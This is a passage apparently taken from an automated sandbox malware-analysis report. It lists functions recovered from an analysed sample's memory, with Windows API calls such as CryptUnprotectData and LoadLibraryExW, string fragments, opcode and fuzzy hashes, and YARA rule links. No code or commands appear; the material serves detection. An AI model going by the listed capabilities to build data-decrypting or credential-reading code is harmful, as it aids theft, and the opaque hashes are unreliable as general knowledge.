                                                • Instruction ID: 2f0499a71e83acca696045191fbca2270fe6c997d4a08eb9915c4ee889d8639b
                                                • Opcode Fuzzy Hash: 5c64746954a007ef365742e46f22399f744c44d8dc6974197fbea0a2f575722e
                                                • Instruction Fuzzy Hash: 69112672800249DFDB10CF99C844BEEBFF4EF48324F148429EA14A7250C379AA94DFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01705869, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54encryptionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 017058D5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14843202509.0000000001700000.00000040.00000010.sdmp, Offset: 01700000, based on PE: false
                                                Similarity
                                                • API ID: CryptDataUnprotect
                                                • String ID: ?H+#
                                                • API String ID: 834300711-596797320
                                                • Opcode ID: 447de6af8e4e0ad42fc93b113de6bef41e0d288956e7bbfde14361fdc9968967
                                                • Instruction ID: 0649306331c92793928dca2d13ac9f59c1b63909d4a4056ea2ce26eaba62f476
                                                • Opcode Fuzzy Hash: 447de6af8e4e0ad42fc93b113de6bef41e0d288956e7bbfde14361fdc9968967
                                                • Instruction Fuzzy Hash: 20213672800249DFDB10CF99C844BDEBFF4EF48320F148419EA14A7250C379A954DFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0166B208, Relevance: 3.5, Instructions: 3473COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14842749268.0000000001660000.00000040.00000010.sdmp, Offset: 01660000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf29e28a5ebff12f44fd6adbfd54b3c19a405af5d0df10b924cd5ed926d7ddba
                                                • Instruction ID: 51f374499182f86a16214352da14c0fa32812c0afc64329444173c71e3b0ab91
                                                • Opcode Fuzzy Hash: bf29e28a5ebff12f44fd6adbfd54b3c19a405af5d0df10b924cd5ed926d7ddba
                                                • Instruction Fuzzy Hash: FE732C35D14B19CACB21EF68C8406ADF7B5FF99300F15C69AD458A7261EB31AAC4CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01284320, Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: ?H+#$?H+#
                                                • API String ID: 0-2548885851
                                                • Opcode ID: 1a02c2dfa0ae8cd4fbcea3892ac3fc3cfa1d21e4fd58ada1a3a6f334309d624f
                                                • Instruction ID: 66b1257d96d67d656fdc05a71e57eb995db63081fe185a5486ab7ad45e52da23
                                                • Opcode Fuzzy Hash: 1a02c2dfa0ae8cd4fbcea3892ac3fc3cfa1d21e4fd58ada1a3a6f334309d624f
                                                • Instruction Fuzzy Hash: DBB18E70E1125ACFDB10EFA8D8817DDBBF2BF88718F148529D914EB294EB749845CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1E2F46C4, Relevance: 2.8, Strings: 2, Instructions: 253COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14853992309.000000001E2F0000.00000040.00000001.sdmp, Offset: 1E2F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: lMw $lMw
                                                • API String ID: 0-2789624484
                                                • Opcode ID: 1f0e77ee85dfa7320181e5205a3a8929ad7156e6854ac64cea16cd2455c659d6
                                                • Instruction ID: 70e5b6c250982456bc3a9f340425d65da9f612c1f4a4126dc5cf40e5c32b7662
                                                • Opcode Fuzzy Hash: 1f0e77ee85dfa7320181e5205a3a8929ad7156e6854ac64cea16cd2455c659d6
                                                • Instruction Fuzzy Hash: 76A17F35E00319DFCB04DBB4C8A49DDFBBAFF8A314B258616E415AB364DB30A945DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 017019B0, Relevance: 2.5, Strings: 1, Instructions: 1251COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14843202509.0000000001700000.00000040.00000010.sdmp, Offset: 01700000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: _
                                                • API String ID: 0-701932520
                                                • Opcode ID: c3eff4b1a0aeaceb3fbec11dcd3a727f4b9429e984628f29c279cf9e5825ca80
                                                • Instruction ID: d1e2c6e52a1b6cc65d78d782c1a6d5d89bab7c773a2e246c1b7b2bc92a4935d2
                                                • Opcode Fuzzy Hash: c3eff4b1a0aeaceb3fbec11dcd3a727f4b9429e984628f29c279cf9e5825ca80
                                                • Instruction Fuzzy Hash: A8A2C235B00345CFDB16DBA8C898AAEBBE6AF89300F158469E505DB3D2DB35DC41CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01286950, Relevance: 2.5, APIs: 1, Instructions: 963libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9fa75cb330f0e7dfd45a3ce7d923988b0c6e2cdbb1a5f94a9cc6764a78c34c15
                                                • Instruction ID: c3b0ddb99ffbdb369b300d32144803646f04af1877966d8dd97f9a7ec9e351d1
                                                • Opcode Fuzzy Hash: 9fa75cb330f0e7dfd45a3ce7d923988b0c6e2cdbb1a5f94a9cc6764a78c34c15
                                                • Instruction Fuzzy Hash: 1BA25A74A15228CFDB64EF74C89869DBBB6BF48305F2080EAD50AA3340CB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1E2F5D41, Relevance: 1.5, Strings: 1, Instructions: 299COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14853992309.000000001E2F0000.00000040.00000001.sdmp, Offset: 1E2F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: =v ,
                                                • API String ID: 0-3559236547
                                                • Opcode ID: 182ff166af01171ec11fce818e79d0af2c0a1d4fe9a9a03d4e597aa6bb906e62
                                                • Instruction ID: da4e3c9eabffab3d0c22e699a67aa311444dbacd20b1f3a6532d72f0ec0c48a3
                                                • Opcode Fuzzy Hash: 182ff166af01171ec11fce818e79d0af2c0a1d4fe9a9a03d4e597aa6bb906e62
                                                • Instruction Fuzzy Hash: BCE137B0809B46ABE712CF64CC581897BB5FB53328B51431BD2616B2E1D7BC148AFF48
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1E2F6AF1, Relevance: 1.5, Strings: 1, Instructions: 217COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14853992309.000000001E2F0000.00000040.00000001.sdmp, Offset: 1E2F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: lMw
                                                • API String ID: 0-1944471245
                                                • Opcode ID: 3fbe643d92577718ee5aabde791bc58adcbda7596ec119e6878a5c0309d91b88
                                                • Instruction ID: ff7cab49253ab6b9ebba9a8be15d6e91806b6b4bcd1d2ac15691f7a957171aac
                                                • Opcode Fuzzy Hash: 3fbe643d92577718ee5aabde791bc58adcbda7596ec119e6878a5c0309d91b88
                                                • Instruction Fuzzy Hash: 19917235E00319DFCB00DBB0D8909DDFBB6EF9A310B158716E416AB7A4DB30A945DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0128BA50, Relevance: .9, Instructions: 897COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 78ee4f35723ee10d066fefbe4e13d2c0bce98aec847cf0f27c731a83deabda37
                                                • Instruction ID: 152922cfea9f25657ea59b8b58978c66be525d22c4394d8e806ccdd9a8fba356
                                                • Opcode Fuzzy Hash: 78ee4f35723ee10d066fefbe4e13d2c0bce98aec847cf0f27c731a83deabda37
                                                • Instruction Fuzzy Hash: 22729F70A111199FDB14DFA8C884AAEBBF6FF89304F148469E505EB3A1DB34DD51CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0128C7B0, Relevance: .9, Instructions: 893COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e9d02f5fae3146ea10e7f8c849d6c71b0130ab8a8ae1c67e9fb2c20ddae915c7
                                                • Instruction ID: b7c4111cdec65585cf12a25f12d9010f202a476e6800caa952a374e5512ae2ff
                                                • Opcode Fuzzy Hash: e9d02f5fae3146ea10e7f8c849d6c71b0130ab8a8ae1c67e9fb2c20ddae915c7
                                                • Instruction Fuzzy Hash: 3A827C30A2120ADFCB15DFA8C884AAEBBF2BF88314F158555E505DB2E6D734EC55CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0170C348, Relevance: .8, Instructions: 798COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14843202509.0000000001700000.00000040.00000010.sdmp, Offset: 01700000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1421a0f8b0181a74ce355f7ae258108fe467511549ad6a11fa8db7d653673046
                                                • Instruction ID: 5ebae77e0d582b0c78bd23528a004e7f4996f6b5cb6cf4473a60ef085fa3c479
                                                • Opcode Fuzzy Hash: 1421a0f8b0181a74ce355f7ae258108fe467511549ad6a11fa8db7d653673046
                                                • Instruction Fuzzy Hash: 0752E374F00344CFDB26DBA8C8947AEBBE2AB85310F1485A9E519AF3C5CB75DC418B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0166A09B, Relevance: .7, Instructions: 747COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14842749268.0000000001660000.00000040.00000010.sdmp, Offset: 01660000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e09a1d0b1d38c9df2f798dec131a2a6ee1f460f554e5bcb02bf0a9928b306298
                                                • Instruction ID: 3c7e8a2adb8b7d3e6189095aabf83c2d382315b21347b20ed8f5925bdd86785b
                                                • Opcode Fuzzy Hash: e09a1d0b1d38c9df2f798dec131a2a6ee1f460f554e5bcb02bf0a9928b306298
                                                • Instruction Fuzzy Hash: 72620C35E106198FCB24DFB8C89469DB7F5AF89300F1086A9D55AAB354EF30AD85CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0170880D, Relevance: .7, Instructions: 661COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14843202509.0000000001700000.00000040.00000010.sdmp, Offset: 01700000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 41369f1ae265e0fd2fc213d2b88db9398312225430069c121e0959ffcd103834
                                                • Instruction ID: 7f787795f89f1ac3c369afe8df876bf16097283bf125dcc7ffbd93c95135e67e
                                                • Opcode Fuzzy Hash: 41369f1ae265e0fd2fc213d2b88db9398312225430069c121e0959ffcd103834
                                                • Instruction Fuzzy Hash: E9429D30E04284CFDB25DBA8C8947ADBBE2AB85304F24C569D109AF3C6DB75EC45CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01664EB0, Relevance: .6, Instructions: 584COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14842749268.0000000001660000.00000040.00000010.sdmp, Offset: 01660000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 163d79b50b2766b2dbe7bd82cbf2f1816abc15f30fb60293ce5d4082300c1ab8
                                                • Instruction ID: 2fe7611a4ab017ea0129de2002631fd6395efeffb4db71ece23d3b67acbb2842
                                                • Opcode Fuzzy Hash: 163d79b50b2766b2dbe7bd82cbf2f1816abc15f30fb60293ce5d4082300c1ab8
                                                • Instruction Fuzzy Hash: CD327A34A11258CFDB14DFA8C8995ADBBF6AF89314F208869E406DB351DB35ED06CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01667A28, Relevance: .4, Instructions: 402COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14842749268.0000000001660000.00000040.00000010.sdmp, Offset: 01660000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f81b0002369fbaebea02b726eefbcb336634ee7bb0f8f30f98354a2f53024b52
                                                • Instruction ID: efce70e46b6efeb2ad0240baab85ea04e1b09831737fce6ddddf29da00249f9e
                                                • Opcode Fuzzy Hash: f81b0002369fbaebea02b726eefbcb336634ee7bb0f8f30f98354a2f53024b52
                                                • Instruction Fuzzy Hash: 0AF16135B002558FCB14DFF8C894A9DBBF6AF88318F248569E415AB395DB35EC42CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0170BF00, Relevance: .4, Instructions: 383COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14843202509.0000000001700000.00000040.00000010.sdmp, Offset: 01700000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3a25e85b5d25a21d8348486ea31c320dbfbd4a63756374519ff46b764afa3165
                                                • Instruction ID: 8e714befcfa85cefc989e64fe20e7839c1e45a5f810cbaf0edb9e2b9af397d61
                                                • Opcode Fuzzy Hash: 3a25e85b5d25a21d8348486ea31c320dbfbd4a63756374519ff46b764afa3165
                                                • Instruction Fuzzy Hash: 40D1D631A04345CFDB23CBA8C8406AEFBF6EF86310F148AAAD155C7696D734E945CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1E2F5E08, Relevance: .3, Instructions: 315COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14853992309.000000001E2F0000.00000040.00000001.sdmp, Offset: 1E2F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: edbe826d5edc70cd82a94bb80d0792afd5d61ca22b73f0de70caf0c8d3492215
                                                • Instruction ID: a2815aa278ca8755ddd962bbb1edb16ea2f45d2087948c3fabe7f30131a3ffb3
                                                • Opcode Fuzzy Hash: edbe826d5edc70cd82a94bb80d0792afd5d61ca22b73f0de70caf0c8d3492215
                                                • Instruction Fuzzy Hash: 2B128DF0408F45AAE722CF65CD482993BB9F756328B50421AD2612B2F5D7BD118BFF48
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01281130, Relevance: .3, Instructions: 260COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 325e92c2e92936b8a542b75ef8e67589e86f17c72235caf4713686efd33417de
                                                • Instruction ID: 76e17b712abafa41853c3211c2b21cc67a5eb281bb62dbbfaac55cbf6ac821dd
                                                • Opcode Fuzzy Hash: 325e92c2e92936b8a542b75ef8e67589e86f17c72235caf4713686efd33417de
                                                • Instruction Fuzzy Hash: 35818474B153189FDB08ABB488A56BE77B7AFC8300B15852DE407E77C4DF7898128791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1E2F4FF0, Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 308COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 1E2F53B6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14853992309.000000001E2F0000.00000040.00000001.sdmp, Offset: 1E2F0000, based on PE: false
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID: ?H+#$\Ow $\Ow $lMw
                                                • API String ID: 4139908857-2370485708
                                                • Opcode ID: eeb1286c6ededc98922dcda19a1f8ba49b1a81f4ea585a68e003cd370d63fa6d
                                                • Instruction ID: d336567886b6e771dfbc8d76bebdcedd643093d89d610a892f975edbc9f91acc
                                                • Opcode Fuzzy Hash: eeb1286c6ededc98922dcda19a1f8ba49b1a81f4ea585a68e003cd370d63fa6d
                                                • Instruction Fuzzy Hash: C9C1BB74A047869FCB04DFB9C8A065EFBF6BF89214B108A29C446DB751EB74EC45CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1E2F6718, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 246COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14853992309.000000001E2F0000.00000040.00000001.sdmp, Offset: 1E2F0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: ?H+#$?H+#
                                                • API String ID: 0-2548885851
                                                • Opcode ID: e39ce7a6bcff4f328038d3bbc5bc12fc9cb1cabc50e9c92b1a0d4c58881233cc
                                                • Instruction ID: 726456bf272483d63f97bf25d277cc99b16d7c090dce22fea92b58f42555fef0
                                                • Opcode Fuzzy Hash: e39ce7a6bcff4f328038d3bbc5bc12fc9cb1cabc50e9c92b1a0d4c58881233cc
                                                • Instruction Fuzzy Hash: 98919A71D0428ADFDF12CFA5D8A09DDBFB2FF4A310F25826AE405AB252C7359845CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1E2F4600, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1E2F690A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14853992309.000000001E2F0000.00000040.00000001.sdmp, Offset: 1E2F0000, based on PE: false
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID: ?H+#$?H+#
                                                • API String ID: 716092398-2548885851
                                                • Opcode ID: a8293d525a7a0ebf3a3a0bd6e7fe4f5835f2caeb1dff63940f6703656cc80898
                                                • Instruction ID: 2d5ba72f19c06ecc300255a35d57406627475914cd78646d20acdb1598fd6fbb
                                                • Opcode Fuzzy Hash: a8293d525a7a0ebf3a3a0bd6e7fe4f5835f2caeb1dff63940f6703656cc80898
                                                • Instruction Fuzzy Hash: C35149B1C04399DFCB01CFAAC8A0ADEBFB5FF4A214F25816AE404AB251D7709844CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1E2F4674, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1E2F690A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14853992309.000000001E2F0000.00000040.00000001.sdmp, Offset: 1E2F0000, based on PE: false
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID: ?H+#$?H+#
                                                • API String ID: 716092398-2548885851
                                                • Opcode ID: 79314894b8ceb45df88dd85ed8acb7f9894bdbbb9bb7b7d4d12e3da5cf2223c4
                                                • Instruction ID: df621158dbfc87429385e3492fa999c35e72370ddc79aaf318829806816aaa4f
                                                • Opcode Fuzzy Hash: 79314894b8ceb45df88dd85ed8acb7f9894bdbbb9bb7b7d4d12e3da5cf2223c4
                                                • Instruction Fuzzy Hash: 6951B2B1D00249DFDB14CFA9C894ADEFBB5FF48310F20862AE815AB210D7759945CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012E1D54, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 012E2B1A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841803824.00000000012E0000.00000040.00000010.sdmp, Offset: 012E0000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID: &w $?H+#
                                                • API String ID: 1029625771-1125459743
                                                • Opcode ID: 02530f8b8d5702abc1a0daf8901f60c443f30f64f530f164952c93776119a858
                                                • Instruction ID: 479c805d7d775e41be25810205590f9ae03919d71e1653137dca6808eb202277
                                                • Opcode Fuzzy Hash: 02530f8b8d5702abc1a0daf8901f60c443f30f64f530f164952c93776119a858
                                                • Instruction Fuzzy Hash: F71106B1D002498FDB20CF9AD448BDEFBF8EF88310F10842AD915A7600C3B4A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012E2860, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 236COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841803824.00000000012E0000.00000040.00000010.sdmp, Offset: 012E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: ?H+#
                                                • API String ID: 0-596797320
                                                • Opcode ID: dc0a3584a0f7701969e930a758cd16fc29dae652c9c3b1a0343449ba46cb00ff
                                                • Instruction ID: a55e328d085bcca95a86f18ff886237bda10db633acd1acae52a63e7a4c1d4ff
                                                • Opcode Fuzzy Hash: dc0a3584a0f7701969e930a758cd16fc29dae652c9c3b1a0343449ba46cb00ff
                                                • Instruction Fuzzy Hash: 3F91A870A10B46CFE724CF69C4487AABBF9BF88250F14892DD586DB640DB75E805CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1E2FA54C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,1E2FA516,?,?,?,?,?), ref: 1E2FA5D7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14853992309.000000001E2F0000.00000040.00000001.sdmp, Offset: 1E2F0000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID: ?H+#
                                                • API String ID: 3793708945-596797320
                                                • Opcode ID: 30dd646af54ca361f831c25cc698e4b391e6a0e552fb3c66b89c43caaae600c0
                                                • Instruction ID: bd50fb4936921a03b9e30fc89b0491b393bc33d907253a20657515159895bfe6
                                                • Opcode Fuzzy Hash: 30dd646af54ca361f831c25cc698e4b391e6a0e552fb3c66b89c43caaae600c0
                                                • Instruction Fuzzy Hash: 4321E2B5D00249DFDB10CFA9D884ADEFBF5FB48320F20851AE915A7210D374A954CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1E2F9ED8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,1E2FA516,?,?,?,?,?), ref: 1E2FA5D7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14853992309.000000001E2F0000.00000040.00000001.sdmp, Offset: 1E2F0000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID: ?H+#
                                                • API String ID: 3793708945-596797320
                                                • Opcode ID: 546ea49f3da5fa79028d35068ba8109f0a1e574ebfa6a59bc699bd6cae13fcd4
                                                • Instruction ID: c7a30fe00764b8c3a24f0d4f65af51982023fad9b6406870acaa2a642a783017
                                                • Opcode Fuzzy Hash: 546ea49f3da5fa79028d35068ba8109f0a1e574ebfa6a59bc699bd6cae13fcd4
                                                • Instruction Fuzzy Hash: FE21D2B5D00248DFDB10CFAAD984ADEFBF9EB48320F14842AE915A7310D374A954CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1E2F5321, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 1E2F53B6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14853992309.000000001E2F0000.00000040.00000001.sdmp, Offset: 1E2F0000, based on PE: false
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID: ?H+#
                                                • API String ID: 4139908857-596797320
                                                • Opcode ID: bdd4a34c9ca36dbc15e8c252ed073de90c885ee57ddbe96320fa712ec6f42532
                                                • Instruction ID: 64bbf84c874842727ad4e55703437a15e7d84918085735ec65acbbfff94704be
                                                • Opcode Fuzzy Hash: bdd4a34c9ca36dbc15e8c252ed073de90c885ee57ddbe96320fa712ec6f42532
                                                • Instruction Fuzzy Hash: 532154B0C00789CFCB10CFAAC45068EFFF1AF89214F20866EC459A7611D375A942CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012E2AA8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 012E2B1A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841803824.00000000012E0000.00000040.00000010.sdmp, Offset: 012E0000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID: ?H+#
                                                • API String ID: 1029625771-596797320
                                                • Opcode ID: e889ba6bc4ec3f20953e48937f52954983aa38161dbb79c5b9775a9c47f1fed4
                                                • Instruction ID: b707545f1fb94907e4a1c1c105e7f16efc5ad32670c51016b2af2b0713a20f73
                                                • Opcode Fuzzy Hash: e889ba6bc4ec3f20953e48937f52954983aa38161dbb79c5b9775a9c47f1fed4
                                                • Instruction Fuzzy Hash: 1E1106B5D102498FDB10CF99D444BDEFBF4AF89314F14842ED515A7600C374A945CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1E2F5349, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 1E2F53B6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14853992309.000000001E2F0000.00000040.00000001.sdmp, Offset: 1E2F0000, based on PE: false
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID: ?H+#
                                                • API String ID: 4139908857-596797320
                                                • Opcode ID: 2f830b5c0c7ad7c38bf0b2865727ccc7ff5373f258cb1459eb4f662688d73672
                                                • Instruction ID: 4e707d90e3e288eb1c08cfcb0d7fa72a5c8802808932f960aaa1496efeac4d39
                                                • Opcode Fuzzy Hash: 2f830b5c0c7ad7c38bf0b2865727ccc7ff5373f258cb1459eb4f662688d73672
                                                • Instruction Fuzzy Hash: D81123B1C006498FCB10CF9AD444BDEFBF9AF89220F10851AD559B7600D7B4A945CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1E2F37C8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 1E2F53B6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14853992309.000000001E2F0000.00000040.00000001.sdmp, Offset: 1E2F0000, based on PE: false
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID: ?H+#
                                                • API String ID: 4139908857-596797320
                                                • Opcode ID: 7b22bd3fb7027b14f84c34353344c8742ea1e89e970a4ed3e6ad40a73c78405b
                                                • Instruction ID: a8312859b08f76ecca455ac38dc13742c4c48aa2d65c3fdd609696b6acb54a0e
                                                • Opcode Fuzzy Hash: 7b22bd3fb7027b14f84c34353344c8742ea1e89e970a4ed3e6ad40a73c78405b
                                                • Instruction Fuzzy Hash: A7112DB1C00649CFCB10CF9AC844B9EFBF5AF89220F11852AD929B7210C7B4A945CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012E5960, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 012E67C5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841803824.00000000012E0000.00000040.00000010.sdmp, Offset: 012E0000, based on PE: false
                                                Similarity
                                                • API ID: Initialize
                                                • String ID: ?H+#
                                                • API String ID: 2538663250-596797320
                                                • Opcode ID: f1cc2d40bb052d4bf31b7a934cddb00d98b86c09bc9e637b30a9d439a06d1888
                                                • Instruction ID: 5e7ff134d6b4a3bd7cc9e3afe12bd705677d0f2ce4cb3677ea6cb50223446c9d
                                                • Opcode Fuzzy Hash: f1cc2d40bb052d4bf31b7a934cddb00d98b86c09bc9e637b30a9d439a06d1888
                                                • Instruction Fuzzy Hash: E41103B09002488FDB20CF99D889BDEBFF4EB49224F108859D618A7610D374A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012E6768, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 012E67C5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841803824.00000000012E0000.00000040.00000010.sdmp, Offset: 012E0000, based on PE: false
                                                Similarity
                                                • API ID: Initialize
                                                • String ID: ?H+#
                                                • API String ID: 2538663250-596797320
